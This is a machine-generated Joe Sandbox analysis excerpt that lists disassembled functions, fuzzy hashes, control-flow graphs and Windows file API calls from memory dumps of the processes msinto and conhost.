                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction ID: b227916acbea63441ba49516ee55eaf2e04fb610f2ad6c6872f37c3405b7b73b
                                                            • Opcode Fuzzy Hash: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction Fuzzy Hash: F2B01200E6740F00A488377E08E206470405B47200FC810B0D70DC008198CD20982263
                                                            Function 00007FFD348A1FF7 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction ID: 970184ef5f453681c824ba3ee8f1bfc658b3069047c65a3a19f2bf84c4be51f5
                                                            • Opcode Fuzzy Hash: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction Fuzzy Hash: 20C02B30F0E01C40E7A4473048510FA32014F43304F0D41F1810AF7082CC3C18003120

                                                            Non-executed Functions

                                                            Function 00007FFD348A09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: 651fb85edec2241e8e4f2d646c03ce2ff3bc321c37d5575cfa5b4b1e7fe45f73
                                                            • Instruction ID: 1aa783e87f7f83d51ef045af4f10062e2c7bb6e07b19927c41d851be2c32a240
                                                            • Opcode Fuzzy Hash: 651fb85edec2241e8e4f2d646c03ce2ff3bc321c37d5575cfa5b4b1e7fe45f73
                                                            • Instruction Fuzzy Hash: 54418F07B0956267E12137FD75711EEABA88F82379B0C5677E24CDA0C3ACB8748582E5

                                                            Execution Graph

                                                            Execution Coverage:4.9%
                                                            Dynamic/Decrypted Code Coverage:58.3%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:12
                                                            Total number of Limit Nodes:0
                                                            execution_graph 28949 7ffd348f3f02 28950 7ffd34910400 GetFileAttributesW 28949->28950 28952 7ffd34910484 28950->28952 28953 7ffd348f3f32 28955 7ffd348f7740 WriteFile 28953->28955 28956 7ffd348f7807 28955->28956 28957 7ffd348f3f52 28959 7ffd348f7560 CreateFileTransactedW 28957->28959 28960 7ffd348f765a 28959->28960 28961 7ffd348f3f62 28962 7ffd3490ef80 CloseHandle 28961->28962 28964 7ffd3490f004 28962->28964

                                                            Executed Functions

                                                            Function 00007FFD348B0D4C Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 180 7ffd348b0d4c-7ffd348b0d9b call 7ffd348b07f8 183 7ffd348b0da0-7ffd348b0eb9 180->183 198 7ffd348b0ebb-7ffd348b0efe 183->198 199 7ffd348b0eff-7ffd348b0f05 183->199 198->199 202 7ffd348b0f07-7ffd348b0f1d 199->202 203 7ffd348b0f1e 199->203 202->203 205 7ffd348b0f1f-7ffd348b1050 202->205 203->205
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5Y_H
                                                            • API String ID: 0-3237497481
                                                            • Opcode ID: 7529edafed0f827b993f20a18f421fb04a4ce7587c916c3b90c40d3ea20d43ff
                                                            • Instruction ID: 245c50c916483be1676e9821d869d20ea2e1b30fc8c811ad94409379c090a68b
                                                            • Opcode Fuzzy Hash: 7529edafed0f827b993f20a18f421fb04a4ce7587c916c3b90c40d3ea20d43ff
                                                            • Instruction Fuzzy Hash: B591D275A1CAC98FE799DB6888B93A97FE1FF56314F0402BAC049D72D2CEB92411C740
                                                            Function 00007FFD348F3F52 Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348e1000_conhost.jbxd
                                                            Similarity
                                                            • API ID: CreateFileTransacted
                                                            • String ID:
                                                            • API String ID: 2149338676-0
                                                            • Opcode ID: ce8f065c2859d3bb0f7ae5ba2ad73d0c7ccb90faf35c2e8ed065488e24016afb
                                                            • Instruction ID: e5302bb1932c9469f15b9d5cc3b05e23bff4768bdb22b1ea525c6de72684fa2c
                                                            • Opcode Fuzzy Hash: ce8f065c2859d3bb0f7ae5ba2ad73d0c7ccb90faf35c2e8ed065488e24016afb
                                                            • Instruction Fuzzy Hash: C341707191CB5C8FDB58EF8CD845AA97BE0FB69721F10426EE449E3251DB70A8418B81
                                                            Function 00007FFD348F3F32 Relevance: 1.6, APIs: 1, Instructions: 124fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 101 7ffd348f3f32-7ffd348f77b1 105 7ffd348f77bb-7ffd348f7805 WriteFile 101->105 106 7ffd348f77b3-7ffd348f77b8 101->106 107 7ffd348f7807 105->107 108 7ffd348f780d-7ffd348f7835 105->108 106->105 107->108
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348e1000_conhost.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: 1b7503427d875259b39fc19176a02e784e0d308926743832ea38c9129587f24b
                                                            • Instruction ID: a985a22e76ff33361c319b8e08df66fb4d5f66b84032b923f30275932834b8bb
                                                            • Opcode Fuzzy Hash: 1b7503427d875259b39fc19176a02e784e0d308926743832ea38c9129587f24b
                                                            • Instruction Fuzzy Hash: 53319231A18A1C8FEB58DF99D8496F9B7E1FBA9311F00426ED04ED3251CB74A845CB91
                                                            Function 00007FFD348F3F02 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 109 7ffd348f3f02-7ffd34910482 GetFileAttributesW 113 7ffd34910484 109->113 114 7ffd3491048a-7ffd349104a6 109->114 113->114
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348e1000_conhost.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: f28c7f6e6f2e4040c8db39692471b999af76871ddc6ffe1d6023e5e60409b580
                                                            • Instruction ID: b76b9b561858a8f87de7bc6e373ebab78bb2e3d12bb3f1682d375d43e6ed44ab
                                                            • Opcode Fuzzy Hash: f28c7f6e6f2e4040c8db39692471b999af76871ddc6ffe1d6023e5e60409b580
                                                            • Instruction Fuzzy Hash: 2F21A170A08A0C9FDB58DB98C849BF9B7E0FB59321F10422ED04AD3651DB71A416CB91
                                                            Function 00007FFD34CA67C8 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 278 7ffd34ca67c8-7ffd34ca67e0 280 7ffd34ca67e8-7ffd34ca6813 278->280 284 7ffd34ca683c-7ffd34ca6842 280->284 285 7ffd34ca6849-7ffd34ca684f 284->285 286 7ffd34ca6815-7ffd34ca682e 285->286 287 7ffd34ca6851-7ffd34ca6856 285->287 290 7ffd34ca6925-7ffd34ca6935 286->290 291 7ffd34ca6834-7ffd34ca6839 286->291 288 7ffd34ca685c-7ffd34ca6891 287->288 289 7ffd34ca6743-7ffd34ca6788 287->289 289->285 295 7ffd34ca678e-7ffd34ca6794 289->295 297 7ffd34ca6938-7ffd34ca6986 290->297 298 7ffd34ca6937 290->298 291->284 299 7ffd34ca6796 295->299 300 7ffd34ca6745-7ffd34ca691d 295->300 298->297 301 7ffd34ca67bf-7ffd34ca67c6 299->301 300->290 301->278 304 7ffd34ca6798-7ffd34ca67b1 301->304 304->290 307 7ffd34ca67b7-7ffd34ca67bc 304->307 307->301
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: ef356437088ace85489a51d3cdd92335f4e9db81b9d595b0108c7175542c55f3
                                                            • Instruction ID: c2f46b17bd080e2d2ad3337859ea8762fbd566f24375ae75c3d0de29f933f1a4
                                                            • Opcode Fuzzy Hash: ef356437088ace85489a51d3cdd92335f4e9db81b9d595b0108c7175542c55f3
                                                            • Instruction Fuzzy Hash: 72516C31F0954A9FDB99DBA8C4A55FDB7B1FF4A304F1440BAC14AE7292DE386901CB41
                                                            Function 00007FFD34CA1778 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 310 7ffd34ca1778-7ffd34ca1790 312 7ffd34ca1798-7ffd34ca17c3 310->312 316 7ffd34ca17ec-7ffd34ca17f2 312->316 317 7ffd34ca17f9-7ffd34ca17ff 316->317 318 7ffd34ca17c5-7ffd34ca17de 317->318 319 7ffd34ca1801-7ffd34ca1806 317->319 320 7ffd34ca18d5-7ffd34ca18e5 318->320 321 7ffd34ca17e4-7ffd34ca17e9 318->321 322 7ffd34ca180c-7ffd34ca1841 319->322 323 7ffd34ca16f3-7ffd34ca1738 319->323 328 7ffd34ca18e8-7ffd34ca1936 320->328 329 7ffd34ca18e7 320->329 321->316 323->317 327 7ffd34ca173e-7ffd34ca1744 323->327 330 7ffd34ca1746 327->330 331 7ffd34ca16f5-7ffd34ca18cd 327->331 329->328 335 7ffd34ca176f-7ffd34ca1776 330->335 331->320 335->310 337 7ffd34ca1748-7ffd34ca1761 335->337 337->320 339 7ffd34ca1767-7ffd34ca176c 337->339 339->335
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: 5f84cd68116b763e0c59d3d946dca6cfa296ab3f261ec573940a78b65c5bab8e
                                                            • Instruction ID: 60a5b70cafd043cea51d3e6208baf5e9567f0b300bca2f1698f885a9bdd1d7c9
                                                            • Opcode Fuzzy Hash: 5f84cd68116b763e0c59d3d946dca6cfa296ab3f261ec573940a78b65c5bab8e
                                                            • Instruction Fuzzy Hash: D2515C31E0964A8FEB99DB98C4A55FDB7B1FF4A300F1440BAD11AE7286CE396901DB40
                                                            Function 00007FFD348B07D0 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HAz4
                                                            • API String ID: 0-4208471536
                                                            • Opcode ID: 1be6086aa528d5f90d2a626cf513d291d6270380fef2cbf67252e14cb1caee28
                                                            • Instruction ID: 7470b4312726b0e37fc381a5c3c137eee02d1f7244ea50c529dd3a121b239b27
                                                            • Opcode Fuzzy Hash: 1be6086aa528d5f90d2a626cf513d291d6270380fef2cbf67252e14cb1caee28
                                                            • Instruction Fuzzy Hash: D7313421A0E7890FE7569B3888B51A93BB0EF87200F0941F7D549C71E3DD2C69068791
                                                            Function 00007FFD348F3F62 Relevance: 1.3, APIs: 1, Instructions: 93COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 410 7ffd348f3f62-7ffd3490f002 CloseHandle 414 7ffd3490f004 410->414 415 7ffd3490f00a-7ffd3490f038 410->415 414->415
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348e1000_conhost.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: 9ef0b903c8a0df2b31bbcb713f29b22efc450490e1ba19313d9a4c64bdaf541b
                                                            • Instruction ID: 053f93fae148e7c1d2cec88daa0d75dd200588896e42db2b33315f085fb70550
                                                            • Opcode Fuzzy Hash: 9ef0b903c8a0df2b31bbcb713f29b22efc450490e1ba19313d9a4c64bdaf541b
                                                            • Instruction Fuzzy Hash: 1121A371A08A1C9FDB58DF98C4497F9B7E0FB55321F00422ED04AD3651DB75A856CB90
                                                            Function 00007FFD348C3E39 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348c0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: f7f5953ae3899e5a2820d93e310ed9247c28813bc19e877a68901a60629dfb34
                                                            • Instruction ID: 4fda67390fcc057460e005070ad3d2f4600f3c0f7bbe75f014eddc603f91c011
                                                            • Opcode Fuzzy Hash: f7f5953ae3899e5a2820d93e310ed9247c28813bc19e877a68901a60629dfb34
                                                            • Instruction Fuzzy Hash: 94E09B3154F3C04FC706D734846C8547F60DE6720174A52EEC085CF1A3DA2DC846C701
                                                            Function 00007FFD348D5EB9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348d3000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 50ab00158210ab127cb768bea3e9e56a868a4ab6bf3761b1adfaae924b612b7b
                                                            • Instruction ID: 559a8e81151099e2fe43a1e0c733a3432fc387e977c490acbe0bf6eb527ac5d3
                                                            • Opcode Fuzzy Hash: 50ab00158210ab127cb768bea3e9e56a868a4ab6bf3761b1adfaae924b612b7b
                                                            • Instruction Fuzzy Hash: 83E0E57194F7C04FCB46AB3488A98547FA0AE67210B8A41EEC146CB1A3E62E8849CB01
                                                            Function 00007FFD348D97C9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348d3000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 22578f3fa9713471383a29442e5ffbf4fc2a5721f6783a8fa0670da67c573d9c
                                                            • Instruction ID: b36cfade61e7417599e45e2cb2920733ffef69a94b617dc15dfc5941e8329226
                                                            • Opcode Fuzzy Hash: 22578f3fa9713471383a29442e5ffbf4fc2a5721f6783a8fa0670da67c573d9c
                                                            • Instruction Fuzzy Hash: 8AE01A7164F7C08FCB06EB7488798447FA0AE6721078B41EEC146CF1B3E62D8849C701
                                                            Function 00007FFD348C3EC9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348c0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: b7ae2ebd4ffa4190982139f3e8607e135252d67c3accfc001f63958704d9c613
                                                            • Instruction ID: 5d118dfe17e14aeb303510172e0d8201a778e17c81815fa7427ef6e053dfacbd
                                                            • Opcode Fuzzy Hash: b7ae2ebd4ffa4190982139f3e8607e135252d67c3accfc001f63958704d9c613
                                                            • Instruction Fuzzy Hash: 31E01AB194E7D04FCB06EB3488A98447FA0EE6731078B44EEC185CF5B3E62D8849C701
                                                            Function 00007FFD34CA19EF Relevance: .4, Instructions: 407COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: da5bc30f2cb8fc3b48be48aa198130a35f0309b142b9d3d1c49de961ac4b9e06
                                                            • Instruction ID: 141af8e55844b342ad7026f410faf4ae213cebb87ac2a8764f7a8c461f0fbbe4
                                                            • Opcode Fuzzy Hash: da5bc30f2cb8fc3b48be48aa198130a35f0309b142b9d3d1c49de961ac4b9e06
                                                            • Instruction Fuzzy Hash: 33E1B330A195558FEB99CF18C4E55B437A1FF46310B5446BEC94ACB68ADE3CF881CB81
                                                            Function 00007FFD34CA2A31 Relevance: .4, Instructions: 404COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 124d8e7d0c7a8723192f84bfa7b1ac839e677bbbe43678a1a2da0ed25d549ebc
                                                            • Instruction ID: fa11c2ddf6b04fac20ebde61443a04c0bd861ba243603dfe9b8096be2ee02999
                                                            • Opcode Fuzzy Hash: 124d8e7d0c7a8723192f84bfa7b1ac839e677bbbe43678a1a2da0ed25d549ebc
                                                            • Instruction Fuzzy Hash: 30D1EF30A0EA568FE3A8DB28D4E11B977E1FF46304B1045BEC58BC3682DA2DB856D741
                                                            Function 00007FFD34CA7AA7 Relevance: .4, Instructions: 388COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4085c1673bd97ce34ce8c15fbeaa38a3bc9ed1ef90ae08c3f978097accc90e32
                                                            • Instruction ID: 0da81d901f51535accf4a54469076754f79da0e5559beca8b80ed4087fb10912
                                                            • Opcode Fuzzy Hash: 4085c1673bd97ce34ce8c15fbeaa38a3bc9ed1ef90ae08c3f978097accc90e32
                                                            • Instruction Fuzzy Hash: B7D1CF30A0FA468FD3A9CB28D4E017977E1FF46304B2445BFC58AC7682DA2DF8469741
                                                            Function 00007FFD34CA1A0F Relevance: .3, Instructions: 334COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 32b46afd6d50176c6d617e2f08659e5c70f908047cb4a91f1ce088b1899a8caa
                                                            • Instruction ID: d8a1d4adef8d2bc0d233e3ab762c98c2779290193d8144a8ce3d974ef0d8a7da
                                                            • Opcode Fuzzy Hash: 32b46afd6d50176c6d617e2f08659e5c70f908047cb4a91f1ce088b1899a8caa
                                                            • Instruction Fuzzy Hash: A4C1A030A195568BEB5DCF18D0E05B937A1FF46310B5446BEC94BCB68ADA3CF841DB80
                                                            Function 00007FFD34CA12A2 Relevance: .3, Instructions: 321COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d72e139311bd4faf73241f8955993d240f72ecca6d913356f63c79a3661b0730
                                                            • Instruction ID: 8c708efea4a963d519c1ffc875d4525ae36ad1d607ee4351d990065a5a4ca246
                                                            • Opcode Fuzzy Hash: d72e139311bd4faf73241f8955993d240f72ecca6d913356f63c79a3661b0730
                                                            • Instruction Fuzzy Hash: C8B19070B19A469FE789DF58C0A16A8B7E1FF5A300F54417AD14EC7A86CF2CB851CB81
                                                            Function 00007FFD34CA62F2 Relevance: .3, Instructions: 319COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 03be3a7172dbaefcd1dd3d19e9c626ed0b3c334aecbbeb7c601aec81e1ea6222
                                                            • Instruction ID: 7253b86be5691ea6469c656341f1c31408a197e74205b606f0b76951416b3b26
                                                            • Opcode Fuzzy Hash: 03be3a7172dbaefcd1dd3d19e9c626ed0b3c334aecbbeb7c601aec81e1ea6222
                                                            • Instruction Fuzzy Hash: 13B19370B09A469FE789DB58C0A16A8B7A1FF5A300F54417ED18EC7A96CB3CF851C781
                                                            Function 00007FFD34CA3CB7 Relevance: .3, Instructions: 309COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 60f218f37f3406eff214e89836e8f41af067eccaa7e871a716831fc4b4a0bdcc
                                                            • Instruction ID: 2d436060b66c1f697f53eb02ada5b36b8f91dc94a494a3def5d40d1366cad6a5
                                                            • Opcode Fuzzy Hash: 60f218f37f3406eff214e89836e8f41af067eccaa7e871a716831fc4b4a0bdcc
                                                            • Instruction Fuzzy Hash: 7E21A216F1E19786F6B562A92CB61FC5AA09F43324F1901BBDE4DD60E2DC1C2885F392
                                                            Function 00007FFD34CA6B55 Relevance: .3, Instructions: 287COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 121edbcb3a052808fcf43f9de1de604f65f8bd428c9acdac80bd14cd1019ab71
                                                            • Instruction ID: ec937a76153322916c6bfb53fddb7568cd965f2d975f21941dd74d7098406a45
                                                            • Opcode Fuzzy Hash: 121edbcb3a052808fcf43f9de1de604f65f8bd428c9acdac80bd14cd1019ab71
                                                            • Instruction Fuzzy Hash: 2CB193306195568BEB98CF18C4E45B837A1FF45314B5446BED99BCB69AC63CF881CB80
                                                            Function 00007FFD34CA07D6 Relevance: .3, Instructions: 260COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4c53f5618d0b91ba7866e73332ee9a953c06533fc52a584e7e07e12e14d07934
                                                            • Instruction ID: bab0ee1fd8a8112ac2c0e2462a1bf59f11e22f55e9c7c915e37049528010579a
                                                            • Opcode Fuzzy Hash: 4c53f5618d0b91ba7866e73332ee9a953c06533fc52a584e7e07e12e14d07934
                                                            • Instruction Fuzzy Hash: 7F811331B0E6064FE7A89E2994A117D77E1EF86390B14057FD28FC3183DE2DB8029792
                                                            Function 00007FFD34CAD75D Relevance: .3, Instructions: 257COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d779cb8fdfad8b59d2fe13ae2488533b93e397ee8307880958a9aefbe69753a2
                                                            • Instruction ID: 3d93beb7048889ee081041cbf2353576a78490311964ccf44031e323cfe06477
                                                            • Opcode Fuzzy Hash: d779cb8fdfad8b59d2fe13ae2488533b93e397ee8307880958a9aefbe69753a2
                                                            • Instruction Fuzzy Hash: 21710521A0F6864FE7A9962448B72AD3BD1EF47310F0406BBD68DC7493ED1C684A93D3
                                                            Function 00007FFD34CA5826 Relevance: .3, Instructions: 252COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 598e20e91be4fccad5d348e0632ccaa91de59ce23217efd846c110c1f7474648
                                                            • Instruction ID: 2a6cc71566365b2d6aca8da3b18dca9c3dc9fea9df68a188b6bbbd9463125145
                                                            • Opcode Fuzzy Hash: 598e20e91be4fccad5d348e0632ccaa91de59ce23217efd846c110c1f7474648
                                                            • Instruction Fuzzy Hash: 1D811631B1EA464FE7E49A6894A117D77F1EF86320B14857FD28EC7183DE2CB8029752
